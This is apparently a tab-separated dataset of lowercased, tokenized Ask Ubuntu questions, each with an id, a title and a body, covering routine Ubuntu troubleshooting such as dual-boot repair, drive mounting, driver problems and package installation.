350341	how can i get the latest vlc if its not available from the vlc download page and its ppa	the latest vlc ( 2.1 ) had just been released - jeej - but , the vlc-ppa does n't contain packages for 13.04 only 13.10 . the vlc download page just says to sudo apt-get install vlc . 2.1.0 highlights with a new audio core , hardware decoding and encoding , port to mobile platforms , preparation for ultra-hd video and a special care to support more formats , 2.1 is a major upgrade for vlc . rincewind has a new rendering pipeline for audio , with better effiency , volume and device management , to improve vlc audio support . it supports many new devices inputs , formats , metadata and improves most of the current ones , preparing for the next-gen codecs . rincewind fixes around a thousand bugs , in more than 7000 commits from 140 volunteers . question : how can i get the latest vlc , if its not available from the vlc download page , and it 's ppa ?
350343	guidelines for packaging web app	for a while now , i 'm trying to build an ubuntu package for ppa upload , and facing all sort of issues understanding bzr dh-make and such . the package is web application ( php-based ) . most packaging guides out there are about compiled software , so i wonder if there 's a guide for packaging things which do n't require compilation ? google 's being surprisingly helpless at that . i was able to create deb package manually and set up a local repository , it was quite straightforward . what i 'm trying to understand is how to create a source package for ppa upload , for something that does n't need compiling . i would highly appreciate any pointers in this regard . thanks !
350348	compiler not found during matlab installation	installing matlab r2012a on ubuntu 13.04 . the entire installation is progressing fine but in the end it shows a dialogue box saying some supported compiler not found , even though i have gcc installed . see the screen shot . after the installation finishes , i try to run matlab from terminal , it says command not found . even which matlab does n't return anything . please help .
350349	custom wallpapers are not showing when selected	i 've added three custom wallpapers to the /usr/share/backgrounds/ folder using the following terminal method - sudo cp /home/master/downloades/company-wallpaper-1.jpg /usr/share/backgrounds/ however , when i right click on the desktop , select change desktop background , click the + button and select any of the three i added , the desktop does not change and the new image is not displayed with a preview , as the defaults are . further more , if i browse to /usr/share/backgrounds/ and try to open them i see the following error could not load image 'company-wallpaper-1.jpg ' . failed to open input stream for file yet if i open the image through the /home/master/downloads/ folder it works just fine . can anybody please help me solve this issue ? thanks .
350351	wireless driver update ?	recently installed ubuntu on a different computer then swapped the disc drive into my netbook ( compaq mini 110 ) everything is working fine but the wireless driver anyone know a solution/update i can try
350352	making windows 8 partition larger	my diskimage is here : my problem is that i want to make my windows 8 partition larger . more specifically i want to use my restore partition to enlarge my windows partition by 20gb.i think that restore partition was put there when windows 8 was installed . what is the best solution here ? is this possible with gparted and a live cd ?
350353	ca n't mount external usb driver on ubuntu 12.04	when plug in external usb driver to pc i see next info : error mounting : mount exited with exit code 1 : helper failed with : mount : wrong fs type , bad option , bad superblock on /dev/sdd1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so i tried to use lsblk , and after this mount this driver i caught next warning : nazar_art @ nazar-desctop : ~ $ lsblk name maj : min rm size ro type mountpoint sda 8:0 0 149.1g 0 disk ├─sda1 8:1 0 148.1g 0 part / ├─sda2 8:2 0 1k 0 part └─sda5 8:5 0 1022m 0 part [ swap ] sdb 8:16 1 3.8g 0 disk └─sdb1 8:17 1 3.8g 0 part /media/sdb1 sdd 8:48 1 7.2g 0 disk └─sdd1 8:49 1 7.2g 0 part nazar_art @ nazar-desctop : ~ $ sudo mount /media/sdd mount : ca n't find /media/sdd in /etc/fstab or /etc/mtab it should work but it does n't . here is my /etc/fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=5f5d330f-d5f2-4157-9496-94f1dce2f181 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=84747ef4-6f50-49bc-9df1-fcba364ba299 none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 /dev/sdc1 /media/sdc1 vfat uid=1000 , noauto , users , exec 0 0 /dev/sdd1 /media/sdd1 vfat uid=1000 , noauto , users , exec 0 0 /dev/sdb1 /media/sdb1 vfat uid=1000 , noauto , users , exec 0 0 here is content of sudo fdisk -l : nazar_art @ nazar-desctop : ~ $ sudo fdisk -l disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000e28b8 device boot start end blocks id system /dev/sda1 * 2048 310484991 155241472 83 linux /dev/sda2 310487038 312580095 1046529 5 extended /dev/sda5 310487040 312580095 1046528 82 linux swap / solaris disk /dev/sdb : 4009 mb , 4009754624 bytes 16 heads , 32 sectors/track , 15296 cylinders , total 7831552 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xd8e1f237 device boot start end blocks id system /dev/sdb1 * 32 7831551 3915760 b w95 fat32 disk /dev/sdd : 7751 mb , 7751073792 bytes 255 heads , 63 sectors/track , 942 cylinders , total 15138816 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc3072e18 device boot start end blocks id system /dev/sdd1 * 63 15138815 7569376+ 7 hpfs/ntfs/exfat update : output of sudo blkid /dev/sdd1 : nazar_art @ nazar-desctop : ~ $ sudo blkid /dev/sdd1 /dev/sdd1 : uuid= '' e6c05cb9c05c9223 '' type= '' ntfs '' questions : why exactly this happen ( on windows this usb works perfect ) ? how to solve this trouble ?
350355	how can i extract sentences from any search engine ?	for people who are learning a foreign language it is very helpful to see usage of particular words in a sentence . for example you want to see different inflections of a verb . i used to look at usage of words in imdb > quotes search section , it almost stores all hollywood movies ' scriptures . i want to make a command line tool to search any word in a search engine and display results in ordered sentence list . i found a few perl script to parse a text into sentences . how can i extract sentences from any search engine and list them in sentences as in jukuu.com bilingual sentence searcher ?
350357	could not get lock /var/lib/dpkg/lock	when i tried to set up git in my computer i encountered the following error : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?
350358	how to remove the limit of a maximum of 16 partions at installation of 12.04 on gpt layout hdd	when i partition the hdd with gparted ( from 12.04 installation media ) , it encounters an error when trying to format partition named sda16 . the error message reads : mkdosfs : device partition expected , not making filesystem on entire device '/dev/sda16 ' ( use -l to override ) i can see sda16 is present in /dev . ( ls -l sda* ( selected output displayed ) ) brw-rw -- -- 1 root disk 8 , 15 sep 26 15:05 sda15 brw-rw -- -- 1 root disk 259 , 0 sep 26 15:05 sda16 brw-rw -- -- 1 root disk 8 , 2 sep 26 15:05 sda2 the strange difference is that all partitions are an 8 , except sda16 which is marked 259 . i assume this is an artificial limit set somewhere by ubuntu , as gpt can have some 128 partitions according to wikipedia . thanks . update : after the first answer i tried to add more partitions after the sda16 and that worked without issues . then i also noticed that sda and sda16 both have 0 ( zero ) as the second number . could that be the reason it thinks it is overwriting a partition table as suggested by david foerster . brw-rw -- -- 1 root disk 8 , 0 sep 26 16:32 sda brw-rw -- -- 1 root disk 8 , 1 sep 26 16:32 sda1 brw-rw -- -- 1 root disk 8 , 10 sep 26 16:32 sda10 brw-rw -- -- 1 root disk 8 , 11 sep 26 16:32 sda11 brw-rw -- -- 1 root disk 8 , 12 sep 26 16:32 sda12 brw-rw -- -- 1 root disk 8 , 13 sep 26 16:32 sda13 brw-rw -- -- 1 root disk 8 , 14 sep 26 15:05 sda14 brw-rw -- -- 1 root disk 8 , 15 sep 26 16:32 sda15 brw-rw -- -- 1 root disk 259 , 0 sep 26 16:32 sda16 brw-rw -- -- 1 root disk 259 , 1 sep 26 16:32 sda17 brw-rw -- -- 1 root disk 259 , 2 sep 26 16:32 sda18 brw-rw -- -- 1 root disk 8 , 2 sep 26 15:05 sda2 can not answer question , but this is what i found out : in fact there is only a problem with sda16 . higher numbers can be created and formatted in ubuntu 12.04 gparted without issue . this issue occurs by design . first the meaning of the numbers in the ls -l output : they are a major , minor device number pair . so 8 , 10 refers to sda10 here . the usage of these numbers is specified centrally at kernel.org in a devices text . put simply : the major number specifies the type of device and the minor number is the `` id '' . major number 3 is for ide devices , 8 is for scsi devices . for hdd devices : the minor number 0 stands for the complete hdd and the following numbers are the individual partitions . add to this that scsi hdds are supposed to have a maximum of 15 partitions according to the devices text . and i guess with a possibility to extend to major number 259 in case it exceeds 15 . as you can see the number combination for sda16 is 259,0 . this combination identifies a whole hdd according to the devices text . and that is why it throws the partition table error . i believe that to be on the safe side i should not use number combinations that for hdd devices end in 0 ( zero ) . as other software probably uses the same specification it could have consequences later as well . i believe that leaves for one gpt layout hdd a maximum of 2 x 15 partitions .
350359	how to get translations on launchpad for a custom program	i wrote a program and uploaded it to a ppa . this program uses translations which i manually create using pylupdate4 translate.pro , then qt-linguist , then lrelease translate.proon my home pc . so the translation process utilizes *ts-files and the binary *qm-files that my program is loading . however i only read about mo , poand such on launchpad to translate something . how can i get my *.ts-files on launchpad so that people can translate them easily ? or am i on the wrong way ? my python program is loading the *.qm files with this code : locale = qlocale ( ) localname = str ( locale.system ( ) .name ( ) ) lang=str.split ( localname , '' _ '' ) [ 0 ] translator= qtcore.qtranslator ( ) translator.load ( getparentdir ( ) + '' /translate/main_ % s '' % lang ) self.app.installtranslator ( translator ) i do n't know if it can handle different files than *.qm .
350370	how to find out my output jack port , buffersize and samplerate ?	i 'm trying to play with fluxus , but i need to find out what parameters i need to send with this function : ( start-audio `` alsa_pcm : capture_1 '' 1024 44100 ) this is that help say : starts up the audio with the specified settings , you 'll need to call this first , or put it into $ home/.fluxus.scm to call it automatically at startup . make the jack port name an empty string and it wo n't try to connect to anything for you . you can use qjackctrl or equivelent to do the connection manually . fluxus reads a single mono source . the fourth parameter let you precise the fluxus jack portname , usefull for fluxus multi-instance .
350371	dynamic data exchange in ubuntu using tcl	i need to access some data in windows , for this i want to use dde ( dynamic data exchange ) provided by tcl language . i found this link in google http : //manpages.ubuntu.com/manpages/precise/man3/dde.3tcl.html # contenttoc4 , but i did n't have success . somebody can help me ? i have tcl installed in my ubuntu 12.04 , but when i call 'dde ' in tclsh i have this message `` invalid command name 'dde ' `` thanks in advance
350377	how to use grep to search for a file anywhere	i 'm finding that a script is getting started twice , so i want to search for the script name in any file anywhere , to see where its getting called . so i did this ... cd / sudo grep -r autostart * but that gives me the error.. boot/system.map-3.5.0-23-generic : c1490f90 t autostart_arrays grep : dev/vsock : invalid argument
350379	how to install this file with python ?	i want to install this file : cvxopt in my ubuntu 13.04 . but i got the following error message : running install running build running build_py running build_ext building 'base ' extension x86_64-linux-gnu-gcc -pthread -fno-strict-aliasing -dndebug -g -fwrapv -o2 -wall -wstrict-prototypes -fpic -i/usr/include/python2.7 -c c/base.c -o build/temp.linux-x86_64-2.7/c/base.o x86_64-linux-gnu-gcc -pthread -fno-strict-aliasing -dndebug -g -fwrapv -o2 -wall -wstrict-prototypes -fpic -i/usr/include/python2.7 -c c/dense.c -o build/temp.linux-x86_64-2.7/c/dense.o x86_64-linux-gnu-gcc -pthread -fno-strict-aliasing -dndebug -g -fwrapv -o2 -wall -wstrict-prototypes -fpic -i/usr/include/python2.7 -c c/sparse.c -o build/temp.linux-x86_64-2.7/c/sparse.o c/sparse.c : in function ‘sparse_concat’ : c/sparse.c:368:28 : warning : variable ‘blk_ncols’ set but not used [ -wunused-but-set-variable ] x86_64-linux-gnu-gcc -pthread -shared -wl , -o1 -wl , -bsymbolic-functions -wl , -bsymbolic-functions -wl , -z , relro -fno-strict-aliasing -dndebug -g -fwrapv -o2 -wall -wstrict-prototypes -d_fortify_source=2 -g -fstack-protector -- param=ssp-buffer-size=4 -wformat -werror=format-security build/temp.linux-x86_64-2.7/c/base.o build/temp.linux-x86_64-2.7/c/dense.o build/temp.linux-x86_64-2.7/c/sparse.o -lm -llapack -lblas -o build/lib.linux-x86_64-2.7/cvxopt/base.so /usr/bin/ld : can not find -llapack /usr/bin/ld : can not find -lblas collect2 : error : ld returned 1 exit status error : command 'x86_64-linux-gnu-gcc ' failed with exit status 1 any help or suggestions will be appreciated !
350380	ca n't get wireless internet with an intel 82562v card ( ubuntu 12.10 )	using lspci -nnk , i can see that the driver was installed out of the box ( e1000e is the driver in use ) . ubuntu discovers the wireless network , and continually asks for the password ( every few minutes or so ? ) . i tried temporarily unloading and reloading the driver ( modprob -r e1000e , modprobe e1000e ) ... and also tried some weird disabling 11n_* i ca n't even remember ... but still unable to get this to work . any ideas ?
350381	grub installation windows and ubuntu 13.04	i have two hard drives , one with no partitions and windows 7 installed on it ( ssd ) : /dev/sda and the second is for ubuntu 13.04 ( hdd ) , and is partitioned for : /dev/sdb1 / /dev/sdb2 /home /dev/sdb3 swap what i need to know is where the grub should be installed , to the windows disk or somewhere on the ubuntu disk ? many thanks .
350386	how do i install qt and vtk ?	i am new to ubuntu and installed it a few days ago on my computer . i want to install some software on it but this software requires a number of other open source software libraries to successfully build : qt version > 4.6 gdal orfeo toolbox vtk 5.10 how can i install these packages in ubuntu ? is it necessary to download them from internet ?
350388	how do i search the startup history	i want to see where a program is getting launched . is there a way to search the startup history for the name of this program ?
350390	set a static ip to lubuntu on virtualbox	i am using lubuntu 13.04 on a virtualbox with a briged adapter . i want to make the ip of my vm static , i looked up on how to do this and many results came up . i went on and edited the interfaces file so now it looks like this : # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback # added by me auto eth0 iface eth0 inet static address 192.168.1.99 netmask 255.255.255.0 gateway 192.168.1.1 when i restart the vm the ip is changed to 192.168.1.99 , but i have no network connectivity . what am i missing ?
350391	gedit plugin to highlight all instances of selection	using gedit 3 , i 've tried multiple plugins to highlight all instances of the current selection ( a la notepad++ ) : https : //code.google.com/p/smart-highlighting-gedit/ https : //github.com/mmuell23/mmuell23 the smart-highlighting will seem to install and let me activate it , but does n't seem to actually do anything . the one at github was written for v2 . to try to hack it into v3 , i 've tried : change .gedit-plugin to just .plugin edit iage=2 to read iage=3 that one still wo n't load ( does n't appear in prefs- > plugins list ) . does n't throw an error , just does n't load . i also ca n't find the gedit logs anywhere to see if there 's a helpful message ( i 'm relatively new to linux ) . i checked /var/logs/ but there 's no gedit . can anyone help ? i just want the auto-highlighting to work .
350392	webapp : email program on linux for yahoo small biz email	i have a linux home server where i am developing some webapps , mainly written in java . i would like these apps to be able to send email thru my isp using my yahoo email accounts . ( i have a paid small business email acct ) . is it best to use something like ssmpt , or is postfix or sendmail a better option ? is sendmail used when your server is the ssmtp server , or can i use it when i pass an email along to my yahoo acct for sending ? thanks . bp
350394	can not boot to ubuntu - windows 8/ubuntu 13.04 dual boot	i will try to make this as quick as i can , while still being as in depth as possible . i have a gateway laptop running windows 8 . i tried to install ubuntu 13.04 side-by-side with windows , and i can not seem to boot into ubuntu ( or see grub at all ) , no matter what i do . first i went into windows disc management , and shrunk my hard drive ( c : ) by 120gb . i downloaded the 64bit ubuntu 13.04 iso and used a disc image creator to burn the iso to a disc creating an ubuntu livecd . i then disabled fastboot in windows 8 through the power options in control panel ( basically disables hibernation , and does n't save a windows state to the harddrive for faster bootup ) and booted to the uefi settings . i disabled secure boot inside of the uefi firmware settings and changed boot priority to boot off of the dvd drive first , and inserted the disc , and booted into the livecd . i selected install ubuntu and continued to the installation . when the installation started up , ubuntu did not find/recognize my windows 8 installation . i selected something else from the menu and created two partitions on the free space portion of my hdd . i used 115gb as primary , ext4 journaling file system , mount point set to root . i then created a 5gb swap partition ( also set to primary i believe ) . the installation finished without a hitch . since finishing the install , i am unable to see grub on boot up , and am launched straight to windows 8 . i tried using easybcd to add ubuntu to the windows boot menu , which worked in adding ubuntu , but when i select it , i get a `` windows is unable to load '' error , and listed nst/neogrub.mbr as corrupt or missing . i have since restored the easybcd backup i made before changing anything , and uninstalled easybcd altogether . i then booted into the livecd again , this time selecting `` try ubuntu without installing '' and ran the following commands in terminal : sudo add-apt-repository ppa : yannubuntu/boot-repair followed by sudo apt-get install boot-repair i then ran a command to update boot repair ( ca n't remember the exact command , maybe sudo apt-get update boot-repair ) and then sudo run boot-repair . i ran boot repair and the paste from that can be found at : http : //paste.ubuntu.com/6156885/ it said that my kernel was `` buggy '' and should be backed up and replaced . i selected no , because i had read a lot about windows not booting once that is done , and i certainly did n't want to make matters worse than they already were . i need to know how to fix my booting issues . i have a theory that the reason it will not work , is because my computer already had 3 partitions on it when i started ( recovery , c : / , and another recovery ) . could this cause the boot problems i am describing ? can i format the partition containing ubuntu ( would this completely uninstall ubuntu ? ) and start over after backing up the recovery partitions and formatting them ? would it even make a difference ? i am mad , because i love my laptop . it 's fast , its got a beautiful display , and plenty of bells and whistles , but i need ubuntu . if i did n't rely on windows for work software that ca n't run inside of a vm , i would scrap windows altogether . please help me .
350398	i want to install 12.04 in asus k55vd-sx313r	recently i bought `` asus k55vd-sx313r '' . earlier i am using lenovo g570 . i installed ubuntu 12.04 in lenovo by choosing `` something else '' option , keeping 2 gb for swap 10gb for root and 5gb for home . after restart normally windows is opening , but ubuntu is not detected . even though hard partitions remain a new drives 10gb and 5gb .
350400	forced to boot into windows 7`	just posted 1 there trying to get a ubuntu and windows dual boot working . i have installed like i was advised but now no matter which hdd i chose to boot from it always loads up windows , and grub does n't even seem too appear . boot without the windows 7 hdd in gives the message 'reboot and select proper boot device ' out of my depth here , any advice would be great , thanks .
350401	how to grant permission for newly created partition ?	i just created 2 brand new partitions ( sda6 , sda7 ) from unallocated space . i wish to perform normal operations such as saving files , creating directory , copying files to these 2 brand new partitions but i can not do any of them . i tried to launch the terminal and using sudo command , it seems like i have to grant permission to my login user ( kongthap ) please guide me what steps i have to go though ? how to label the 2 brand new created partitions to something else readable ? ( picture 1 ) if i did n't want to see windows partitions ( the 2 105gb volumes ) while using ubuntu at all , is there any way to do that ?
350403	how to install 'gimp-plugin registry is not installed	i am having the same problem basically . i says my gimp-plugin registry is not installed , yet , the program is still there and working . i wanted to try to fix an old color photo and thought that installing `` gimp 2.8 would be better . i am running raring ringtail 13.04.with no windows . apparently it came with gimp 2.6.this is the message i get when i tried to uninstall to replace it with gimp 2.8 any ideas ? reading package lists ... done building dependency tree reading state information ... done package 'gimp-plugin-registry ' is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . andy @ andy-945gcm-s2l : ~ $ sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded .
350406	resolution do n't go over 1024x768 with ati radeon hd 3870	i 've just installed ubuntu , and i have a problem with my resolution . i think the os ca n't recognize my monitor ( or video card ) , and that 's why i could only get maximum 1024x768 . my monitor : hp l2208 my videocard : ati radeon hd 3870 how i can get the proper driver for it ? or if the driver is right , how can i fix that problem ? i want 1680x1050_60.00 resolution . i 've tried to uninstall the driver and install the new one , but now i got the system is running in low resolution error . i 'm not sure that ubuntu supports my video card anymore . i followed this tutorial with the installation : what is the correct way to install ati catalyst video drivers ( fglrx ) ? any ideas , guys ?
350407	canâ´t use nvidia gpu ?	could somebody please explain to me how i use my 740m gpu from nvidia instead of the hd4000 form intel ? i am using ubuntu 13.04 on a asus n56vb
350409	conky does not display wireless info	i had a problem with displaying wifi signal strength and ip in conky ( though downloaded and uploaded amounts and dl/up bitrates were getting displayed ) . i use a dell studio 1535 laptop with a broadcom wireless adapter ( bcm4312 ) . after googling for a while and being unable to find a solution , i thought it might be beneficial to share my experience of resolving this problem . it 's worth to mention that i use linux mint 15 64 bit , which is based on ubuntu ( repositories and everything ) , therefore i think this must apply to ubuntu as well .
350413	surface pro dual boot ubuntu issues- can not launch boot-repair	same problem as this guy : problems with windows 8/ubuntu 13.04 dualboot surface pro i 'm following this guide to installing ubuntu on my surface pro dual boot surface pro with ubuntu ? i 'm fine until step 4 when he installs boot repair from the internet . how do you deal with that ? because the problem is that the surface pro drivers are having major issues with ubuntu and require a fix . but i ca n't do anything until i fix grub
350416	pdf chain page limit	i am using pdf chain to merge several single page pdf documents . but this program only adds 26 pages at a time , i want to combine 100 pages at once . i am doing something wrong or is there a setting i am missing ?
350417	how can i limit the size of my ~/.cache folder	i 'm running ubuntu on a limited-size ssd , so i count every gb . now , the ~/.cache folder grew to 1.7 gb ( various applications such as chrome , spotify etc . filled it up ) and now i 'm wondering if there 's a way to limit the size of this cache ? i saw some solutions suggesting adding a cronjob to delete old files using some awk trickery , but i do n't know how would all these applications handle if random files were just deleted ( or is that ok ? ) . also , this solution does n't recursively search the folder .
350418	installing .sh file - mojo problem	so guys , i 've done a lot of research on how to install and .sh file , and i tried it all but none of it works . here is what i get after every possible way i 've tried to run it : uncompressing mojo setup ... ... ... ... .. collecting info for this system ... operating system : linux cpu arch : x86_64 trying mojosetup in bin/linux/x86_64 panic initial setup failed . can not continue . error : could n't run mojosetup i 've tried to google it but i found nothing so i would appreciate any help .
350420	which ubuntu application is responsible for dimming the screen when its going to lock ?	i want to write a custom application which can dim my screen . i like the default effect of dimming the screen in ubuntu when system it 's not in use for 10 minutes ( default setting ) . which program or code in kernel is responsible for this effect ?
350421	enable window switcher keystrokes in ubuntu 13.04	i love the ctrl-alt-left ( and all related ) keystrokes for switching workspaces in ubuntu . i recently made the mistake of disabling opengl in the ccsm ( dumb , i know ) . i 've since re-enabled opengl , but the one feature that seems to not have returned is the ability to switch workspaces with the ctrl-alt-left keystrokes . a few notes : ( 1 ) i can switch workspaces with super-s and then left-right-up-down . however , i find this slow , and i also ca n't move items between workspaces this way . ( 2 ) i have enabled workspaces ( i.e . `` enable workspaces '' is checked in the appearances window ) , since this is 13.04 . ( 3 ) in the keyboard settings , the key bindings do appear to be set properly ( e.g . `` switch to workspace left '' is set to ctrl+alt+left ) any ideas ? thanks !
350422	[ solved optimus nvidia problem ] black login screen after installing ubuntu 12.04	i have successfully installed ubuntu 12.04 ( 64bit ) on my new pc . however , after the install i hear the login screen drum but screen stays black . i have disabled secure boot so far i 've tried these : shift key = > e = > change `` quiet splash '' to `` nomodeset '' ( gpurole blank screen ) shift key = > e = > change `` quiet splash '' to `` no splash '' ( stays black ) my pc spec : ( clevo w230st ) , used to be win8 , nvidia gtx 765m with optimus technology , intel i7-4700mq , ssd 480gb crucial m5 i am not sure if i should install nvidia driver or not since some people said i should n't since i have nvidia optimus . i 'm willing to learn and listen . thanks !
350424	application settings and environmental variables	i was perusing an article on environment variables on wikipedia : http : //en.wikipedia.org/wiki/environment_variable one of the environment variables is path and you can access this environment variable on the command line with echo $ path . then it mentions another environment variable for application settings : '' home/ { .appname } ( unix-like ) and appdata { developername\appname } ( microsoft windows ) - for storing application settings . '' ok so in my home directory ( /home/guarddog ) for the guarddog user i 'm logged in as , i have a app name directory ( .mygateway ) , and in it i have application settings files : ~/.mygateway $ ls config.json database.json how would i access the contents of these settings using environment variables like how i did it with $ path ?
350429	installing ubuntu stuck at retrieving file 40 of 90	i downloaded the 32 bit ubuntu 12.04 extended support version . during the installation , i selected the option that say download all updates . that installation happened till installing system and that 's when it got stuck ! the progress bar stopped moving . i stopped the installation there and started all over again . this time , i dint check the updates option . now , its stuck at retrieving files 40 out of 90 . the installation happens till 40 . but 40 never really goes at all . its just stuck there ! what would be the problem ?
350430	boot multiple extracted isos from usb	all , ( again ) i am trying to make a live usb for multiple linux cds . i have made a folder named `` linux '' on the root of the usb and in it is folders for : ubuntu desktop 13.04 `` ubuntu1304 '' ubuntu server 13.04 `` ubuntuserv1304 '' ubuntu gnome 13.04 `` ugnome1304 '' back track 5 `` backtrack5 '' the folder name is on the right in quotes . i am trying to boot from them but i keep getting into a busy box term and i want them to boot into the live environment . here is my menu.lst : default 0 # gfxmenu /nst/gfx-boot.gfx ( working gui menu for after the main system works ) title windows menu find -- set-root /bootmgr chainloader +1 boot title ubuntu desktop 13.04 kernel /linux/ubuntu1304/casper/vmlinuz initrd /linux/ubuntu1304/casper/initrd.lz boot note i would like the system to be able to boot on more than one computer .
350432	how to use minecraft_server.1.6.4.jar on ubuntu server 12.04 lts	i am not sure whether i should host my minecraft server with ubuntu server os . all i know is that ubuntu 's os is faster and the firewall is stronger . i 'm a newbie with zero knowledge on ubuntu and server stuff . can anyone tell me how to use ubuntu server 12.04 lts to create minecraft server , or am i simply asking the wrong questions and i should get ubuntu os instead ? ?
350433	raise/lower volume commands only work in range 8-100 ; mute command does n't toggle mute	i 'm using lubuntu 13.04 , and use the following commands bound to keys to raise volume , lower volume , and toggle mute , respectively : amixer -c 1 -q set master 1 % + unmute amixer -c 1 -q sset master 1 % - unmute amixer -c 1 -q sset master toggle for some reason , the raise and lower command do not work when the volume is between 0 and 8 ( inclusive ) ; specifically , if the volume is above 8 , the lower volume command will lower it until it reaches 8 , and then will do nothing ; similarly , if the volume is at or below 8 , it can not be raised by the raise volume command . why is this so ? which command ( s ) will work properly ? the mute command does not toggle , it only mutes . why ? which command will toggle mute properly ? note that these commands were , sans the -c 1 in each , part of my lubuntu distribution 's lubuntu-rc.xml file . i added the -c 1 due to a comment to this question .
350434	ubuntu 12.04 ca n't open folders with menu shortcuts , can only open from desktop now	i tried to open archived files with rar and make it the default file manager and ended up choosing the wrong rar file that can open said files . before this i uninstalled thunar and archive file manager too . since it did n't work i reinstalled both the latter including 7zip and the rar plugin to open rar files . i set archive file manager as the default file manager again but now i either get no response from trying to open folders from the panels or with the dropbox shortcut when left-clicking on `` open dropbox folder '' , i gives me the error : failed to execute default file manager input/output error i tried use mimeopen ( e.g . mimeopen -d ~/desktop/ ) but this only allowed me to get back to opening my desktop shorcuts like home and filesystems . how can i get all of this back to normal as if nothing happened ?
350436	gnome 3 search bar does n't work	my question is virtually the same as this one , which is left unanswered . by the way i disagree with the close vote as too localized because hey ! i 'm a future visitor and i found it useful : ) but i digress . i run ubuntu 12.04 lts , kernel version 3.2.0-53-generic . i got rid of unity ( apart from the login screen ) and installed gnome 3 , currently on version 3.4.2.1 . i also have the advanced calculator and firefox bookmarks extensions , they are gone too . the windows and applications tabs still work , as does the multiple desktops thing . purging and reinstalling gnome-shell did not solve the problem . to clarify : when i say the search box does n't work , i mean i type something in it and i see no search results . in the picture above , firefox should have appeared , but it did n't . the same is true for the advanced calculator and the firefox bookmarks plugins which leads me to believe there 's something wrong with core gnome shell , and not the plugins themselves . question : do you know what might be causing this , and , do you have any suggestion on how to fix it ?
350437	installing python modules on ubuntu	i have been using python on windows for a while , so i 'm into a lot of modules , including pygame and livewires , but how do i install them into ubuntu ? i have the py file for livewires , which has been specially edited ( from a book i 'm reading ) . i want to install it , but i 'm not sure how to . i also want to install pygame , but i ca n't .
350440	ubuntu-server basic gui installation	can anyone offer suggestions on how i can build websites via the commandline of my linux virtualbox and view my websites in browsers based in the windows area ? i installed ubuntu 12.04 desktop in a virtualbox on my windows platform . the idea was to use it as my linux web development area but it was too slow and sluggish at best . so , i installed ubuntu-server 12.04 planning to just interact with the commandline . the problem is because i 'm using linux in a virtualbox i ca n't preview my websites in the windows area . -- -or -- - directions on installing a barebones gui on my ubuntu-server so i can install web browsers to work on my websites ? thanks in advance for any help . clarification : sorry , if my original question was confusing . basically , my problem is i need a way to apply code changes to website files via my ubuntu-server virtualbox and view the effects in a browser either within the virtualbox or outside of it i : e in windows .
350448	configure tomcat in eclipse	i have by default tomcat installed in my system which i can start/stop from terminal using : sudo /etc/init.d/tomcat7 start sudo /etc/init.d/tomcat7 stop but unfortunately i ca n't configure the same in eclipse kepler . i have tried all possibilities of directing the apache tomcat v7.0 in the tomcat installation directory ( window > prefernces > server > runtime environment > add > tomcat7 ) but still getting this notification : `` unknown version of tomcat was specified . '' can anyone help me with tomcat configuration for eclipse ( without re-installing another server ) .
350451	ubuntu 12.04 ca n't recognize smartphone alcatel one touch 4007d ?	ubuntu 12.04 ca n't recognize smartphone alcatel one touch 4007d . i get this error : unable to mount dbus error org.gtk.private.remotevolumemonitor.failed : an operation is already pending
350453	unlocking laptop appears to open the hud	if i unlock my laptop , i 'm forced to manually close the hud . i 've been finding that it 's automatically opening with each time i unlock the machine . it 's only happening on one of my devices running 13.10 but i ca n't figure it out . have i ticked an option i did n't know about ? how do i prevent this ?
350457	software center is crashing immediately in ubuntu 12.04	i opened it in the terminal and got the following error : 2013-09-26 12:12:44,585 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-09-26 12:12:44,589 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2013-09-26 12:12:44,678 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2013-09-26 12:12:44,738 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . 2013-09-26 12:12:44,740 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 176 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1422 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1352 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 154 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 171 , in init_view self.apps_filter ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 238 , in __init__ self.build ( desktopdir ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 511 , in build self._build_homepage_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 257 , in _build_homepage_view self._append_banner_ads ( ) file `` 